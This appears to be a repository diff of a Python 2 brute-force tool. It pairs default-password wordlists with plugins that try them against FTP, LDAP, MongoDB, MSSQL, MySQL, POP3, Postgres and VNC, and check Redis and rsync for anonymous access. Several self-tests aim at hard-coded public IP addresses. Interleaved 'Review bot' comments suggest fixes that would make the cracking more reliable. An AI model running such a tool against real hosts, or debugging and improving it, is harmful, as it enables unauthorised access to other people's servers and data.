telnet-disabled|Telnet is disabled now
telnet|^\xff\xfe
telnet|^xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd.*
vnc|^RFB.*'

67
Bruteforce/conf/smb.conf Normal file

@ -0,0 +1,67 @@
administrator:1
administrator:12
administrator:
administrator:administrator
administrator:123
administrator:1234
administrator:12345
administrator:123456
administrator:1234567
administrator:12345678
administrator:123456789
administrator:1234567890
administrator:654321
administrator:54321
administrator:00000000
administrator:88888888
administrator:pass
administrator:password
administrator:passwd
administrator:!@#$%^
administrator:1q2w3e
administrator:qawsed
administrator:pwd
administrator:1qaz2ws3e4
administrator:qazwsxedc
administrator:!@#$%^&*
admin:1
admin:12
admin:admin
admin:123
admin:1234
admin:12345
admin:123456
admin:1234567
admin:12345678
admin:123456789
admin:1234567890
admin:654321
admin:54321
admin:00000000
admin:88888888
admin:pass
admin:password
admin:passwd
admin:!@#$%^
admin:1q2w3e
admin:qawsed
admin:pwd
admin:1qaz2ws3e4
admin:qazwsxedc
admin:!@#$%^&*
admin:rootpass
admin:rootpassword
admin:rootpasswd
test:1
test:123123
test:12
test:123
test:1234
test:12345
test:123456
test:1234567
test:12345678
test:123456789
test:test
test:654321
test:54321


@ -0,0 +1 @@
public

86
Bruteforce/conf/ssh.conf Normal file

@ -0,0 +1,86 @@
root:1
root:12
root:root
root:root123
root:root123456
root:123
root:1234
root:12345
root:123456
root:1234567
root:12345678
root:123456789
root:1234567890
root:654321
root:54321
root:00000000
root:88888888
root:pass
root:password
root:passwd
root:!@#$%^
root:1q2w3e
root:qawsed
root:pwd
root:test
root:qwe123
root:1qaz2ws3e4
root:qazwsxedc
root:!@#$%^&*
root:root123
root:root123456
root:rootpass
root:rootpassword
root:rootpasswd
root:admin
root:admin123
root:-
root:_
root:1qaz2wsx
root:666666
root:888888
root:123123
root:toor
root:123abc
root:passw0rd
admin:1
admin:12
admin:admin
admin:123
admin:1234
admin:12345
admin:123456
admin:1234567
admin:12345678
admin:123456789
admin:1234567890
admin:654321
admin:54321
admin:00000000
admin:88888888
admin:pass
admin:password
admin:passwd
admin:!@#$%^
admin:1q2w3e
admin:qawsed
admin:pwd
admin:1qaz2ws3e4
admin:qazwsxedc
admin:!@#$%^&*
admin:rootpass
admin:rootpassword
admin:rootpasswd
test:1
test:12
test:123
test:1234
test:123123
test:12345
test:123456
test:1234567
test:12345678
test:123456789
test:test
test:654321
test:54321


@ -0,0 +1,69 @@
tomcat:1
tomcat:12
tomcat:tomcat
tomcat:tomcat123
tomcat:tomcat123456
tomcat:123
tomcat:1234
tomcat:12345
tomcat:123456
tomcat:1234567
tomcat:12345678
tomcat:123456789
tomcat:1234567890
tomcat:654321
tomcat:54321
tomcat:00000000
tomcat:88888888
tomcat:pass
tomcat:password
tomcat:passwd
tomcat:!@#$%^
tomcat:1q2w3e
tomcat:qawsed
tomcat:pwd
tomcat:1qaz2ws3e4
tomcat:qazwsxedc
tomcat:!@#$%^&*
tomcat:s3cret
admin:1
admin:12
admin:admin
admin:123
admin:1234
admin:12345
admin:123456
admin:1234567
admin:12345678
admin:123456789
admin:1234567890
admin:654321
admin:54321
admin:00000000
admin:88888888
admin:pass
admin:password
admin:passwd
admin:!@#$%^
admin:1q2w3e
admin:qawsed
admin:pwd
admin:1qaz2ws3e4
admin:qazwsxedc
admin:!@#$%^&*
admin:rootpass
admin:rootpassword
admin:rootpasswd
test:1
test:12
test:123
test:1234
test:12345
test:123456
test:1234567
test:123123
test:12345678
test:123456789
test:test
test:654321
test:54321

34
Bruteforce/conf/vnc.conf Normal file

@ -0,0 +1,34 @@
root
vnc
vnc123
vncpass
vnc123456
vncpassword
vncpasswd
123
1234
12345
123456
1234567
12345678
123456789
1234567890
654321
rootpass
54321
00000000
88888888
pass
password
passwd
!@#$%^
1q2w3e
qawsed
pwd
1qaz2ws3e4
qazwsxedc
!@#$%^&*
root123
root123456
rootpassword
rootpasswd

69
Bruteforce/conf/web.conf Normal file

@ -0,0 +1,69 @@
cisco:1
cisco:12
cisco:cisco
cisco:123
cisco:1234
cisco:12345
cisco:123456
cisco:1234567
cisco:12345678
cisco:123456789
cisco:1234567890
cisco:654321
cisco:54321
cisco:00000000
cisco:88888888
cisco:pass
cisco:password
cisco:passwd
cisco:!@#$%^
cisco:1q2w3e
cisco:qawsed
cisco:pwd
cisco:1qaz2ws3e4
cisco:qazwsxedc
cisco:!@#$%^&*
cisco:rootpass
cisco:rootpassword
cisco:rootpasswd
admin:1
admin:12
admin:admin
admin:123
admin:1234
admin:12345
admin:123456
admin:1234567
admin:12345678
admin:123456789
admin:1234567890
admin:654321
admin:54321
admin:00000000
admin:88888888
admin:pass
admin:password
admin:passwd
admin:!@#$%^
admin:1q2w3e
admin:qawsed
admin:pwd
admin:1qaz2ws3e4
admin:qazwsxedc
admin:!@#$%^&*
admin:rootpass
admin:rootpassword
admin:rootpasswd
test:1
test:12
test:123
test:1234
test:12345
test:123456
test:1234567
test:123123
test:12345678
test:123456789
test:test
test:654321
test:54321


@ -0,0 +1 @@
#!/usr/bin/python

Binary file not shown.


@ -0,0 +1,101 @@
# coding: utf-8
__author__="wilson"
import os
import sys
sys.path.append("../")
from plugins.ftp import *
from plugins.smb import *
from plugins.mysql import *
from plugins.mssql import *
from plugins.ldapd import *
from plugins.mongodb import *
from plugins.redisexp import *
from plugins.rsync import *
from plugins.snmp import *
from plugins.ssh import *
from plugins.ssltest import *
from plugins.vnc import *
from plugins.web import *
def ftpburp(c):
t = ftp_burp(c)
return t
def smbburp(c):
t = smb_burp(c)
return t
def mysqlburp(c):
t = mysql_burp(c)
return t
def mssqlburp(c):
t = mssql_burp(c)
return t
def ldapburp(c):
t = ldap_burp(c)
return t
def mongodbburp(c):
t = mongodb_burp(c)
return t
def redisburp(c):
t = redis_burp(c)
return t
def rsyncburp(c):
t = rsync_burp(c)
return t
def snmpburp(c):
t = snmp_burp(c)
return t
def sshburp(c):
t = ssh_burp(c)
return t
def sslburp(c):
t = ssl_burp(c)
return t
def vncburp(c):
t = vnc_burp(c)
return t
def webburp(c):
t = web_burp(c)
return t
#类
class pluginFactory():
def __init__(self,c):
self.pluginList=[]
self.config=c
self.pluginCategory= {
"ftp":ftpburp,
"smb":smbburp,
"mysql":mysqlburp,
"mssql":mssqlburp,
"ldap":ldapburp,
"mongodb":mongodbburp,
"redis":redisburp,
"rsync":rsyncburp,
"snmp":snmpburp,
"ssh":sshburp,
"ssl":sslburp,
"vnc":vncburp,
"web":webburp,
}
self.get_pluginList()
def get_pluginList(self):
for name in self.pluginCategory:
#实例化每个类
result_t=self.pluginCategory.get(name)(self.config)
self.pluginList.append(result_t)
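Review bot: The thirteen `xxxburp(c)` functions above `pluginFactory` each just forward `c` to a constructor, so `pluginCategory` can hold the classes directly (`"ftp": ftp_burp,` and so on) and `get_pluginList` keeps working unchanged, since it only calls the looked-up value with `self.config`. `import os` is unused, and `sys.path.append("../")` is resolved against the current working directory rather than this file's location, so the `from plugins.*` imports depend on where the tool is launched from; `os.path.dirname(os.path.abspath(__file__))` would make that location-independent. Iteration order of the `self.pluginCategory` dict is arbitrary in Python 2, so the order in which plugins are instantiated and later run varies between interpreters; iterate an explicit list if the order matters.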

Binary file not shown.

BIN
Bruteforce/plugins/.DS_Store vendored Normal file

Binary file not shown.


@ -0,0 +1 @@
__author__ = 'wilson'

Binary file not shown.

76
Bruteforce/plugins/ftp.py Normal file

@ -0,0 +1,76 @@
#coding=utf-8
import time
import threading
from multiprocessing.dummy import Pool
from printers import printPink,printGreen
from ftplib import FTP
class ftp_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/ftp.conf")
def ftp_connect(self,ip,username,password,port):
crack=0
try:
ftp=FTP()
ftp.connect(ip,str(port))
ftp.login(user=username,passwd=password)
crack=1
ftp.close()
except Exception,e:
self.lock.acquire()
print "%s ftp service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
return crack
def ftp_l(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
if self.ftp_connect(ip,username,password,port)==1:
self.lock.acquire()
printGreen("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['ftp']):
printPink("crack ftp now...")
print "[*] start crack ftp %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['ftp']:
pool.apply_async(func=self.ftp_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop ftp serice %s" % time.ctime()
print "[*] crack ftp done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'ftp': ['192.168.1.1:21']}
pinglist=['192.168.1.1']
test=ftp_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
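Review bot: `ftp_connect` closes the connection only on the success path — `ftp.close()` sits after `ftp.login` inside the `try` — so every failed attempt leaves its socket open until garbage collection, and with `Pool(threads)` workers that adds up quickly; move the close into a `finally:`. The `except Exception,e` in the same method prints the same "login fail" text for every error, including connection refused and timeouts, so an unreachable host is indistinguishable from a rejected credential in the output; let the exception type drive the message instead of discarding `e`. `ftp_l` then wraps the whole loop in `except Exception,e: pass`, so any error that escapes the inner handler vanishes without a trace.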

BIN
Bruteforce/plugins/ftp.pyc Normal file

Binary file not shown.


@ -0,0 +1,86 @@
#coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import ldap
class ldap_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/ldapd.conf")
def ldap_connect(self,ip,username,password,port):
creak=0
try:
ldappath='ldap://'+ip+':'+port+'/'
l = ldap.initialize(ldappath)
re=l.simple_bind(username,password)
if re==1:
creak=1
except Exception,e:
if e[0]['desc']=="Can't contact LDAP server":
creak=2
pass
return creak
def ldap_creak(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.ldap_connect(ip,username,password,port)
if flag==2:
self.lock.acquire()
printGreen("%s ldap at %s can't connect\r\n" %(ip,port))
self.lock.release()
break
if flag==1:
self.lock.acquire()
printGreen("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
else:
self.lock.acquire()
print "%s ldap service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['ldap']):
printPink("crack ldap now...")
print "[*] start ldap %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['ldap']:
pool.apply_async(func=self.ldap_creak,args=(str(ip).split(':')[0],str(ip).split(':')[1]))
pool.close()
pool.join()
print "[*] stop ldap serice %s" % time.ctime()
print "[*] crack ldap done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'ldap': ['124.172.223.236:389']}
pinglist=['192.168.1.1']
test=ldap_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
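Review bot: `ldap_connect` cannot tell a successful bind from a failed one: `l.simple_bind(...)` is the asynchronous call and returns a message id rather than a result, and on a fresh connection that id is in practice 1, so `re==1` flags the first credential pair on every reachable host as a weak password whatever the server answered. Use the synchronous form, `re=l.simple_bind_s(username,password)`, catch `ldap.INVALID_CREDENTIALS` for the failure case and `ldap.SERVER_DOWN` for the unreachable case instead of matching `e[0]['desc']` text, and call `l.unbind_s()` afterwards so the connection is released. The `e[0]['desc']` subscript itself raises on any non-ldap exception (a TypeError on a plain socket error, for instance) and is then swallowed by the outer `except` in `ldap_creak`, so such hosts vanish from the output with no message. The `__main__` self-test targets a hard-coded public address; it should use a lab-host placeholder.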


@ -0,0 +1,101 @@
#coding=utf-8
import time
import threading
from printers import printPink,printRed,printGreen
from multiprocessing.dummy import Pool
import pymongo
class mongodb_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/mongodb.conf")
def mongoDB_connect(self,ip,username,password,port):
crack=0
try:
connection=pymongo.Connection(ip,port)
db=connection.admin
db.collection_names()
self.lock.acquire()
printRed('%s mongodb service at %s allow login Anonymous login!!\r\n' %(ip,port))
self.result.append('%s mongodb service at %s allow login Anonymous login!!\r\n' %(ip,port))
self.lock.release()
crack=1
except Exception,e:
if e[0]=='database error: not authorized for query on admin.system.namespaces':
try:
r=db.authenticate(username,password)
if r!=False:
crack=2
else:
self.lock.acquire()
crack=3
print "%s mongodb service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
except Exception,e:
pass
else:
printRed('%s mongodb service at %s not connect' %(ip,port))
crack=4
return crack
def mongoDB(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.mongoDB_connect(ip,username,password,port)
if flag in [1,4]:
break
if flag==2:
self.lock.acquire()
printGreen("%s mongoDB at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s mongoDB at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['mongodb']):
printPink("crack mongodb now...")
print "[*] start crack mongodb %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['mongodb']:
pool.apply_async(func=self.mongoDB,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop mongoDB serice %s" % time.ctime()
print "[*] crack mongoDB done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'mongodb': ['112.90.23.158:27017']}
pinglist=['192.168.1.1']
test=mongodb_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
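Review bot: `mongoDB_connect` recognises the "authentication required" case by comparing the exception's full message at `if e[0]=='database error: not authorized for query on admin.system.namespaces':`; that text is server-version specific, and any other wording falls through to `crack=4` ("not connect"), so an authenticated server and an unreachable one become indistinguishable in the report. Catch `pymongo.errors.OperationFailure` for the authorization case and `pymongo.errors.ConnectionFailure` for connectivity instead of the string. `pymongo.Connection` is the pre-3.x API (`MongoClient` replaced it), and the object created at `connection=pymongo.Connection(ip,port)` is never closed, so a 50-thread pool leaks a socket per attempt; add `connection.close()` in a `finally:`. The hard-coded public address in the `__main__` block should be a lab-host placeholder.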


@ -0,0 +1,67 @@
#coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import pymssql
class mssql_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/mssql.conf")
def mssql_connect(self,ip,username,password,port):
crack =0
try:
db=pymssql.connect(host=str(ip)+':'+str(port),user=username,password=password)
if db:
crack=1
db.close()
except Exception, e:
self.lock.acquire()
print "%s sql service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
return crack
def mssq1(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=mssql_connect(ip,username,password,port)
if flag==2:
break
if flag==1:
self.lock.acquire()
printGreen("%s mssql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s mssql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['mysql']):
printPink("crack sql serice now...")
print "[*] start crack sql serice %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['mssql']:
pool.apply_async(func=self.mssq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop crack sql serice %s" % time.ctime()
print "[*] crack sql serice done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
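Review bot: `mssq1` calls `flag=mssql_connect(ip,username,password,port)` without `self.`, which raises NameError on the first credential and is then swallowed by the `except Exception,e: pass` beneath it, so this plugin never tests anything and never says why; it must read `flag=self.mssql_connect(ip,username,password,port)`. `run` also guards on the wrong key — `if len(ipdict['mysql']):` while iterating `ipdict['mssql']` — so mssql targets are skipped or a KeyError is raised depending on whether mysql hosts were found; change it to `if len(ipdict['mssql']):`. The `if flag==2: break` branch is dead because `mssql_connect` only returns 0 or 1, so a host that refuses connections is retried for the whole wordlist; return a distinct code for connection errors the way `mysql_connect` does. This file is the only `*_burp` plugin without a `__main__` self-test, which is how the first two bugs went unnoticed.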


@ -0,0 +1,80 @@
#coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import MySQLdb
class mysql_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/mysql.conf")
def mysql_connect(self,ip,username,password,port):
crack =0
try:
db=MySQLdb.connect(ip,username,password,port=port)
if db:
crack=1
db.close()
except Exception, e:
if e[0]==1045:
self.lock.acquire()
print "%s mysql's %s:%s login fail" %(ip,username,password)
self.lock.release()
else:
self.lock.acquire()
print "connect %s mysql service at %s login fail " %(ip,port)
self.lock.release()
crack=2
return crack
def mysq1(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.mysql_connect(ip,username,password,port)
if flag==2:
break
if flag==1:
self.lock.acquire()
printGreen("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['mysql']):
printPink("crack mysql now...")
print "[*] start crack mysql %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['mysql']:
pool.apply_async(func=self.mysq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop crack mysql %s" % time.ctime()
print "[*] crack mysql done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'mysql': ['127.0.0.1:3306']}
pinglist=['127.0.0.1']
test=mysql_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
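Review bot: the `except Exception,e: pass` closing `mysq1` swallows every error from the credential loop — including the IndexError from `data.split(':')[1]` on a wordlist line without a colon — and silently abandons the rest of the list for that host; the same pattern sits in `ldap_creak`, `mongoDB`, `mssq1`, `smb_l`, `snmp_l`, `ssh_l` and `vnc_l`. Parse each line with `username,_,password=data.partition(':')`, `continue` on malformed entries, and print the exception (e.g. `print "%s mysql: %s" %(ip,e)`) rather than dropping it, so a wordlist typo is visible instead of looking like a clean host. `MySQLdb.connect(ip,username,password,port=port)` is also called without `connect_timeout`, so an unresponsive host blocks a pool worker indefinitely.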

Bruteforce/plugins/ndr.pyc Normal file


@ -0,0 +1,61 @@
#coding=utf-8
import time
from printers import printPink,printGreen
import threading
from multiprocessing.dummy import Pool
import poplib
def pop3_Connection(ip,username,password,port):
try:
pp = poplib.POP3(ip)
#pp.set_debuglevel(1)
pp.user(username)
pp.pass_(password)
(mailCount,size) = pp.stat()
pp.quit()
if mailCount:
lock.acquire()
printGreen("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
result.append("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
lock.release()
except Exception,e:
print e
lock.acquire()
print "%s pop3 service 's %s:%s login fail " %(ip,username,password)
lock.release()
pass
def pop3_l(ip,port):
try:
d=open('conf/pop3.conf','r')
data=d.readline().strip('\r\n')
while(data):
username=data.split(':')[0]
password=data.split(':')[1]
pop3_Connection(ip,username,password,port)
data=d.readline().strip('\r\n')
except Exception,e:
print e
pass
def pop_main(ipdict,threads):
printPink("crack pop now...")
print "[*] start crack pop %s" % time.ctime()
starttime=time.time()
global lock
lock = threading.Lock()
global result
result=[]
pool=Pool(threads)
for ip in ipdict['pop3']:
pool.apply_async(func=pop3_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop pop serice %s" % time.ctime()
print "[*] crack pop done,it has Elapsed time:%s " % (time.time()-starttime)
return result
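Review bot: `pop3_Connection` ignores its `port` argument — `pp = poplib.POP3(ip)` always connects to 110 while the report prints `port` — so hosts found on a non-default port are probed on the wrong one; it should be `pp = poplib.POP3(ip, port, timeout=8)`. The success test `if mailCount:` is also wrong: `pp.pass_(password)` has already succeeded by then, so a valid login with an empty mailbox is recorded as a failure. The wordlist handle `d` in `pop3_l` is opened per host and never closed; use `with open('conf/pop3.conf','r') as d:` (the same leak is in `postgreS`). This module also uses module globals and a `pop_main(ipdict,threads)` entry point rather than the `*_burp` class with `run(self,ipdict,pinglist,threads,file)` the other plugins expose, so it cannot be driven the same way.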

Bruteforce/plugins/pop3.pyc Normal file


@ -0,0 +1,73 @@
#coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import psycopg2
import re
def postgres_connect(ip,username,password,port):
crack =0
try:
db=psycopg2.connect(user=username, password=password, host=ip, port=port)
if db:
crack=1
db.close()
except Exception, e:
if re.findall(".*Password.*",e[0]):
lock.acquire()
print "%s postgres's %s:%s login fail" %(ip,username,password)
lock.release()
crack=2
else:
lock.acquire()
print "connect %s postgres service at %s login fail " %(ip,port)
lock.release()
crack=3
pass
return crack
def postgreS(ip,port):
try:
d=open('conf/postgres.conf','r')
data=d.readline().strip('\r\n')
while(data):
username=data.split(':')[0]
password=data.split(':')[1]
flag=postgres_connect(ip,username,password,port)
time.sleep(0.1)
if flag==3:
break
if flag==1:
lock.acquire()
printGreen("%s postgres at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
result.append("%s postgres at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
lock.release()
break
data=d.readline().strip('\r\n')
except Exception,e:
print e
pass
def postgres_main(ipdict,threads):
printPink("crack postgres now...")
print "[*] start postgres %s" % time.ctime()
starttime=time.time()
global lock
lock = threading.Lock()
global result
result=[]
pool=Pool(threads)
for ip in ipdict['postgres']:
pool.apply_async(func=postgreS,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop crack postgres %s" % time.ctime()
print "[*] crack postgres done,it has Elapsed time:%s " % (time.time()-starttime)
return result
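Review bot: `postgres_connect` classifies failures with `re.findall(".*Password.*",e[0])`, which depends on the server's error wording (and locale); anything else becomes `crack=3`, which `postgreS` treats as "host down" and stops the whole list for that host. psycopg2 raises `OperationalError` for both the authentication and the connectivity case, so pass `connect_timeout=8` to `psycopg2.connect(...)` so unreachable hosts fail fast, and only break when the message indicates a connection failure rather than whenever the regex misses. The wordlist handle opened at `d=open('conf/postgres.conf','r')` is never closed; use a `with` block. Like pop3, this module is function-based with `global lock` / `global result` instead of a `*_burp` class exposing `run(...)`, so the factory that drives the other plugins cannot run it unchanged.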


@ -0,0 +1,66 @@
#coding=utf-8
import time
import threading
from threading import Thread
from printers import printPink,printGreen
from Queue import Queue
import redis
class redis_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
#self.lines=self.config.file2list("conf/redis.conf")
self.sp=Queue()
def redisexp(self):
while True:
ip,port=self.sp.get()
try:
r=redis.Redis(host=ip,port=port,db=0,socket_timeout=8)
r.dbsize()
self.lock.acquire()
printGreen('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port))
self.result.append('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port))
self.lock.release()
except Exception,e:
pass
self.sp.task_done()
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['redis']):
printPink("crack redis now...")
print "[*] start crack redis %s" % time.ctime()
starttime=time.time()
for i in xrange(threads):
t = Thread(target=self.redisexp)
t.setDaemon(True)
t.start()
for ip in ipdict['redis']:
self.sp.put((str(ip).split(':')[0],int(str(ip).split(':')[1])))
self.sp.join()
print "[*] stop redis serice %s" % time.ctime()
print "[*] crack redis done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'redis': ['101.201.177.35:6379']}
pinglist=['101.201.177.35']
test=redis_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
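Review bot: `redisexp` folds every failure into `except Exception,e: pass`, so a server that answers `NOAUTH Authentication required` (raised as `redis.exceptions.ResponseError`) is indistinguishable from a timeout or a refused connection, and none of them is logged; catch `redis.exceptions.ResponseError` separately and print a "requires auth" line so operators can see which hosts were reachable. The workers are daemon threads looping on `self.sp.get()` forever, and `run` starts `threads` new ones on every call without retiring the previous set, so a second `run` doubles the thread count; a sentinel item per worker after `self.sp.join()` would bound that. The `__main__` block hard-codes a public address as its target; use a lab-host placeholder.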


@ -0,0 +1,97 @@
# -*- coding: utf-8 -*-
import threading
from printers import printPink,printRed,printGreen
from multiprocessing.dummy import Pool
from Queue import Queue
import re
import time
import threading
from threading import Thread
from rsynclib import *
import sys
import socket
socket.setdefaulttimeout(10)
sys.path.append("../")
class rsync_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.sp=Queue()
def get_ver(self,host):
debugging = 0
r = rsync(host)
r.set_debuglevel(debugging)
return r.server_protocol_version
def rsync_connect(self,ip,port):
creak=0
try:
ver=self.get_ver(ip)# get rsync moudle
fp = socket.create_connection((ip, port), timeout=8)
fp.recv(99)
fp.sendall(ver.strip('\r\n')+'\n')
time.sleep(3)
fp.sendall('\n')
resp = fp.recv(99)
modules = []
for line in resp.split('\n'):
#print line
modulename = line[:line.find(' ')]
if modulename:
if modulename !='@RSYNCD:':
self.lock.acquire()
printGreen("%s rsync at %s find a module:%s\r\n" %(ip,port,modulename))
self.result.append("%s rsync at %s find a module:%s\r\n" %(ip,port,modulename))
#print "find %s module in %s at %s" %(modulename,ip,port)
self.lock.release()
modules.append(modulename)
except Exception,e:
print e
pass
return creak
def rsync_creak(self,ip,port):
try:
self.rsync_connect(ip,port)
except Exception,e:
print e
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['rsync']):
printPink("crack rsync now...")
print "[*] start crack rsync %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['rsync']:
pool.apply_async(func=self.rsync_creak,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop rsync serice %s" % time.ctime()
print "[*] crack rsync done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
from comm.config import *
c=config()
ipdict={'rsync': ['103.228.69.151:873']}
pinglist=['103.228.69.151']
test=rsync_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
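Review bot: `rsync_connect` opens two connections per host and leaks both: `get_ver` builds `r = rsync(host)` (which connects on the library default port regardless of the `port` argument) and never calls `r.close()`, and the second socket `fp` is never closed either. Construct it as `rsync(ip, port=port)`, read `server_protocol_version`, close it, or simply reuse that object's `getModules()` instead of a second raw socket. The module list is taken from a single `fp.recv(99)`, so any listing longer than 99 bytes is truncated and modules are silently missed; read until the daemon's `@RSYNCD: EXIT` line. `creak` is always 0 and `modules` is built but never returned, so the function's return value carries no information; return `modules` so `rsync_creak` can act on it. `import threading` is duplicated at the top of the file.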


@ -0,0 +1,194 @@
import base64
import re
try:
import hashlib
hash_md4 = hashlib.new("md4")
hash_md5 = hashlib.md5()
except ImportError:
# for Python << 2.5
import md4
import md5
hash_md4 = md4.new()
hash_md5 = md5.new()
# Import SOCKS module if it exists, else standard socket module socket
try:
import SOCKS; socket = SOCKS; del SOCKS # import SOCKS as socket
from socket import getfqdn; socket.getfqdn = getfqdn; del getfqdn
except ImportError:
import socket
from socket import _GLOBAL_DEFAULT_TIMEOUT
__all__ = ["rsync"]
# The standard rsync server control port
RSYNC_PORT = 873
# The sizehint parameter passed to readline() calls
MAXLINE = 8192
protocol_version = 0
# Exception raised when an error or invalid response is received
class Error(Exception): pass
# All exceptions (hopefully) that may be raised here and that aren't
# (always) programming errors on our side
all_errors = (Error, IOError, EOFError)
# Line terminators for rsync
CRLF = '\r\n'
LF = '\n'
# The class itself
class rsync:
'''An rsync client class.
To create a connection, call the class using these arguments:
host, module, user, passwd
All arguments are strings, and have default value ''.
Then use self.connect() with optional host and port argument.
'''
debugging = 0
host = ''
port = RSYNC_PORT
maxline = MAXLINE
sock = None
file = None
server_protocol_version = None
# Initialization method (called by class instantiation).
# Initialize host to localhost, port to standard rsync port
# Optional arguments are host (for connect()),
# and module, user, passwd (for login())
def __init__(self, host='', module='', user='', passwd='',port=873,
timeout=_GLOBAL_DEFAULT_TIMEOUT):
self.timeout = timeout
if host:
self.connect(host)
if module and user and passwd:
self.login(module, user, passwd)
def connect(self, host='', port=0, timeout=-999):
'''Connect to host. Arguments are:
- host: hostname to connect to (string, default previous host)
- port: port to connect to (integer, default previous port)
'''
if host != '':
self.host = host
if port > 0:
self.port = port
